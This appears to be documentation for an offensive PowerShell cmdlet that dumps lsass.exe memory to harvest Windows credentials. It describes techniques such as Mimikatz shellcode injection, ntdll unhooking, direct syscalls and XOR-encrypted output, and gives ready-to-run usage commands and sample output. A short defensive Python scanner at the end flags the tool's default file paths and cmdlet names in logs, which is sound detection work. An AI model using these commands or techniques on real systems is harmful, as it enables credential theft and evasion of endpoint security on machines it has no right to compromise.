## Description

Dumps lsass.exe memory to disk using a selectable technique with optional GZip compression and XOR encryption.

## Overview

This script opens a handle to lsass.exe, captures its memory using the requested technique, and writes the result to disk. On success the cmdlet emits a FileInfo object for the written file so the path can be piped to downstream commands.

The Mimikatz and UnhookSyscalls techniques operate differently: they restore the clean ntdll.dll .text section from disk and inject embedded shellcode into a sacrificial process. For these techniques, -OutputPath and -Encrypt are not applicable and no FileInfo is emitted.

The Stealth technique always applies GZip compression followed by XOR encryption regardless of -Encrypt; use Invoke-ShadowDecrypt to recover the plaintext MDMP.

When any transform (compression or encryption) is applied, the cmdlet emits a second object immediately after the FileInfo that describes the transforms and, for encrypted output, includes the XOR key and a ready-to-run Invoke-ShadowDecrypt command.
## Parameters

| Parameter | Type | Mandatory | Default | Description |
|---|---|---|---|---|
| Technique | DumpTechnique | Yes | — | The dump method to use. See the Techniques table below. |
| OutputPath | string | No | Technique-specific (see table) | Destination file path for the dump. Relative paths are resolved against the current PowerShell location. Not applicable to Mimikatz or UnhookSyscalls. |
| Encrypt | bool | No | $false | XOR-encrypt the dump in memory before writing to disk. Supported by Callbacks and Fork only. |
| Compress | bool | No | $false | GZip-compress the dump before writing to disk. Supported by all techniques except Mimikatz, UnhookSyscalls, and Stealth (which always compresses). Can be combined with -Encrypt. |
## Techniques

| Technique | Encrypt | Compress | Default Output Path | Description |
|---|---|---|---|---|
| Mimikatz | N/A | N/A | Shellcode-controlled | Restores the clean ntdll .text section, then injects the embedded Mimikatz shellcode (PAN resource) into a sacrificial process. |
| UnhookSyscalls | N/A | N/A | Shellcode-controlled | Same ntdll-unhook pass as Mimikatz, but injects the embedded direct-syscall shellcode (OFF resource) instead. |
| Simple | Unsupported | Supported | C:\Users\Public\simpleMDWD.raw | Straightforward MiniDumpWriteDump call with SeDebugPrivilege. |
| Callbacks | Supported | Supported | C:\Users\Public\callback.elf | IoWriteAllCallback redirects all dbghelp file I/O into an in-memory buffer before writing to disk. |
| Fork | Supported | Supported | C:\Users\Public\panda.raw | RtlCreateProcessReflection fork of lsass; MiniDumpWriteDump is called on the forked handle. |
| Syscalls | Unsupported | Supported | C:\Users\Public\sysMDWD.file | Direct-syscall NtOpenProcess stub opens lsass without touching the Win32 API surface. |
| Native | Unsupported | Supported | C:\Users\Public\panda.sense | Fully native MDMP writer: walks memory with VirtualQueryEx, reads pages with NtReadVirtualMemory, and serialises the MDMP by hand, with no MiniDumpWriteDump dependency. |
| Stealth | Always (GZip+XOR) | Always (GZip+XOR) | C:\Users\Public\stealth_dump.gz | Direct-syscall NtOpenProcess + MiniDumpWriteDump into a memory-preferred temp file. Output is always GZip-compressed then XOR-encrypted. |
## Dependencies

- dumpermodule

## Operating Systems

- Windows x64

## Pre-Requisites

- SeDebugPrivilege (Administrator or equivalent elevated token)
## Example Usage

Dump lsass using the Native technique (uncompressed):

```powershell
New-ShadowDump -Technique Native
```

Dump using Native with GZip compression:

```powershell
New-ShadowDump -Technique Native -Compress -OutputPath C:\Temp\dump.gz
```

Dump using Callbacks with XOR encryption:

```powershell
New-ShadowDump -Technique Callbacks -Encrypt -OutputPath C:\Temp\dump.elf
```

Dump using Callbacks with both GZip compression and XOR encryption:

```powershell
New-ShadowDump -Technique Callbacks -Compress -Encrypt -OutputPath C:\Temp\dump.gz
```

Run the Stealth technique (always compresses and encrypts; no flags needed):

```powershell
New-ShadowDump -Technique Stealth -OutputPath C:\Temp\out.gz
```
## Example Output

Uncompressed, unencrypted techniques emit a FileInfo object:

```text
FullName : C:\Users\Public\panda.sense
Length   : 83886080
```

Compressed-only output also emits a transform info object:

```text
FullName   : C:\Users\Public\panda.sense
Length     : 41943040

Compressed : True
Note       : File is GZip-compressed. Decompress with GZip to recover the MDMP.
```

Encrypted output emits the XOR key details:

```text
FullName    : C:\Users\Public\callback.elf
Length      : 83886080

XorMask     : 0x9A1C5B9C
XorKey1     : 0x9A1C
XorKey2     : 0x5B9C
DecryptWith : Invoke-ShadowDecrypt -InputPath "C:\Users\Public\callback.elf" -OutputPath "callback.mdmp"
```

Compressed and encrypted output (including Stealth) emits both:

```text
Compressed  : True
XorMask     : 0x9A1C5B9C
XorKey1     : 0x9A1C
XorKey2     : 0x5B9C
DecryptWith : Invoke-ShadowDecrypt -InputPath "C:\Users\Public\stealth_dump.gz" -OutputPath "stealth_dump.mdmp"
Note        : File is GZip-compressed then XOR-encrypted. After XOR-decryption, decompress the result with GZip to recover the MDMP.
```

The Mimikatz and UnhookSyscalls techniques do not emit any output; the output location is controlled by the injected shellcode.
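From the defender's side, the default output paths in the Techniques table and the two cmdlet names are the artifacts this documentation gives away. The following Python scanner is an added example, not part of the module or its documentation: it walks process-creation and file-creation log lines and flags any that reference those default artifact paths or the cmdlet names. The `|`-separated log record format and the sample lines are constructed for illustration; path matching is case-insensitive because NTFS paths are.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Default output paths taken from the Techniques table on this page,
# mapped to the technique that produces them.
DEFAULT_ARTIFACTS = {
    r"C:\Users\Public\simpleMDWD.raw": "Simple",
    r"C:\Users\Public\callback.elf": "Callbacks",
    r"C:\Users\Public\panda.raw": "Fork",
    r"C:\Users\Public\sysMDWD.file": "Syscalls",
    r"C:\Users\Public\panda.sense": "Native",
    r"C:\Users\Public\stealth_dump.gz": "Stealth",
}

# Cmdlet names documented on this page.
CMDLET_PATTERN = re.compile(r"\b(New-ShadowDump|Invoke-ShadowDecrypt)\b", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int
    reason: str
    technique: Optional[str]  # None when the match is a cmdlet name, not a path


def scan_line(line_no: int, line: str) -> List[Finding]:
    """Return every indicator found in one log line."""
    findings: List[Finding] = []
    lowered = line.lower()
    # Windows paths are case-insensitive, so compare lower-cased.
    for path, technique in DEFAULT_ARTIFACTS.items():
        if path.lower() in lowered:
            findings.append(Finding(line_no, f"default dump artifact {path}", technique))
    match = CMDLET_PATTERN.search(line)
    if match:
        findings.append(Finding(line_no, f"cmdlet {match.group(1)} in command line", None))
    return findings


def scan_log(lines: List[str]) -> List[Finding]:
    """Scan a whole log (one event per line) and collect findings in order."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, 1):
        findings.extend(scan_line(line_no, line))
    return findings


# Constructed sample events (hypothetical format: time|event|image|detail).
SAMPLE_LOG = [
    "2024-01-01T10:00:00Z|ProcessCreate|powershell.exe|Get-Process lsass",
    "2024-01-01T10:00:05Z|ProcessCreate|powershell.exe|New-ShadowDump -Technique Callbacks -Encrypt -OutputPath C:\\Temp\\dump.elf",
    "2024-01-01T10:00:09Z|FileCreate|powershell.exe|C:\\Users\\Public\\panda.sense",
    "2024-01-01T10:00:20Z|FileCreate|notepad.exe|C:\\Users\\Public\\notes.txt",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}" + (f" (technique: {f.technique})" if f.technique else ""))
```

The second sample line is caught only by the cmdlet name: it uses a custom -OutputPath, which the artifact-path check cannot see. That is the limit of this kind of matching, since every technique except Mimikatz and UnhookSyscalls accepts an arbitrary path, so path indicators should be treated as a low-cost supplement to telemetry on handle access to lsass.exe rather than as the primary detection.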
